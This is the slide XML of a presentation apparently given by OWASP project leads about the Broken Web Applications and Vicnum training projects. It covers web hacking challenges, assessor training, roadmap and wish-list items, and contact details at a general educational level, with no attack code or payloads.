        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3046466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t>Technical Issues in Web Hacking</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="53252" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1600200"/>
            <a:ext cx="8458200" cy="4525963"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" lvl="1" indent="-342900" eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Hacking a network is different than hacking a web app</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="1" indent="-342900" eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Similarities do exist in certain areas</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0"/>
              <a:t>Cryptography checking</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>Credential </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0"/>
              <a:t>attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0"/>
              <a:t>Tools exist for scanning, fuzzing ….</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="1" indent="-342900" eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> But major technical challenges exist</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>A  request/response protocol where state is always an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0"/>
              <a:t>issue</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0"/>
              <a:t>Code to be evaluated on both server and browser!</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0" eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="253286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p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Mordecai (Mo) Kraushar</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Director of Audit, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>CipherTechs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>QSA</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>OWASP Project Lead, Vicnum</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>OWASP New York City chapter member</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4851400"/>
            <a:ext cx="2425700" cy="558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648200"/>
            <a:ext cx="990600" cy="990600"/>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9677" y="4505291"/>
            <a:ext cx="1524000" cy="180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565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267200" y="228600"/>
            <a:ext cx="4724400" cy="715962"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Non Technical Issues in Web Hacking</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="53252" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" lvl="1" indent="-342900" eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Ultimately web pages are set up by application programmers meeting  a business requirement</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="1" indent="-342900" eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Data works its way into web sites that might be difficult for a tool or a security analyst to evaluate</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Comments might </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>contain inappropriate </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>data</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>URL fields can be manipulated and might show unintended web pages</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>URL parameters can also be guessed </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>and may </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>leak information</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Hidden fields in form fields can </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>be </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>viewed and manipulated </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>And then there are those business logic issues!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>How can we prepare assessors for the non technical piece of an assessment?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="856029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Going Forward</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Flowchart: Process 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="851646" y="3252351"/>
            <a:ext cx="1524000" cy="118800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Technologies</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Flowchart: Process 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5715000" y="3336708"/>
            <a:ext cx="1488141" cy="90032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ways to or detect or block attacks</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Flowchart: Process 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5715000" y="1828800"/>
            <a:ext cx="14478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tools to discover</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Flowchart: Process 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3352800" y="3197351"/>
            <a:ext cx="1219200" cy="118800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Security Issues</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Flowchart: Process 18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5686288" y="4663307"/>
            <a:ext cx="2238512" cy="181369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Broken web applications needed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>to raise awareness and sharpen skills</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>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009510">
            <a:off x="4573823" y="2741398"/>
            <a:ext cx="1143000" cy="19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808243">
            <a:off x="4531870" y="4619892"/>
            <a:ext cx="1143000" cy="19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344270" y="3868469"/>
            <a:ext cx="1080253" cy="18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600298" y="3775867"/>
            <a:ext cx="1143000" cy="19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476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needed!</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Near </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Term </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Items </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Documentation </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>can use some </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>work</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Catalog </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>of vulnerabilities can be </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>expanded</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Longer Term</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Will </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>get increasingly difficult to support </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>older applications due </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>to library and other dependency </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>issues</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>May </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>move to multiple </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>VMs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Would </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>like to improve set of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>applications</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1262792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Wish List</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="77500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>More </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>applications in more languages </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>–</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>ASP.NET</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Python</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Node.js </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>More </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>modern </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>UIs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Rich JavaScript</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>HTML5</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Mobile </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>optimized </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>sites</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>More </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>database </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>back ends</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>PostgreSQL</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>No SQL</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>More web services</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1920495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dirty="0" smtClean="0"/>
              <a:t>Questions and Review</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>   </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33796" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="1752600"/>
            <a:ext cx="8382000" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="77500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>We welcome your feedback and contributions!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2600" dirty="0" smtClean="0">
              <a:hlinkClick r:id="rId3"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>://www.owasp.org/index.php/OWASP_Broken_Web_Applications_Project</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2900" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2900" dirty="0"/>
              <a:t>@</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2900" dirty="0" err="1" smtClean="0"/>
              <a:t>owaspbwa</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2900" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2900" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2900" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>mordecai.kraushar@owasp.org</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2900" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2900" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>nicole.becher@owasp.org</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2900" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2900" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2900" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2900" dirty="0">
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2900" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>vicnum.ciphertechs.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2900" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2900" dirty="0">
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2900" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>://cyclone.ciphertechs.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2900" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2900" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2900" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2900" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2848958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Assessing the assessor</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Network Assessment</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Content Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Known methodologies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Reconnaissance</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Discover</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Fingerprint</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Enumerate</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Exploit</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Known tools</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Nmap</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Vulnerability Manager</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
